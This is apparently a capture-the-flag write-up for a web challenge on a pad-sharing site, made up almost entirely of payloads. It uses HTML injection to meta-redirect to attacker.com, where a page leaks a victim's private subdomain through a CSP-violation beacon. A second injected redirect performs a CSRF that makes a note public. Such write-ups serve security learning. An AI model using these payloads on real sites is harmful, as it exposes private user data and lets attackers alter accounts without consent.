Tags: web
Rating: 5.0
**tl;dr**
+ meta redirect to attacker website, using the html injection in the paaad.
+ leak the unique subdomain with csp violation.
+ Another meta redirect csrf with the leaked subdomain to make the note public.
``First pad``
```html
<meta http-equiv="refresh" content="1; url=https://attacker.com/attacker.html">
```
``https://attacker.com/attacker.html``
```html
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Security-Policy" content="frame-src 'self' xn--pd-viaaa.space;">
<title>TEST</title>
</head>
<body>
<script>
document.addEventListener('securitypolicyviolation', async function (event) {
console.log(event)
navigator.sendBeacon(location.href,event.blockedURI)
});
</script>
<iframe src="https://päääd.space/p/latest"></iframe>
</body>
</html>
```
``Second pad``
```html
<meta http-equiv="refresh" content="1; url=unique_id.xn--pd-viaaa.space?edit=isPublic">
```
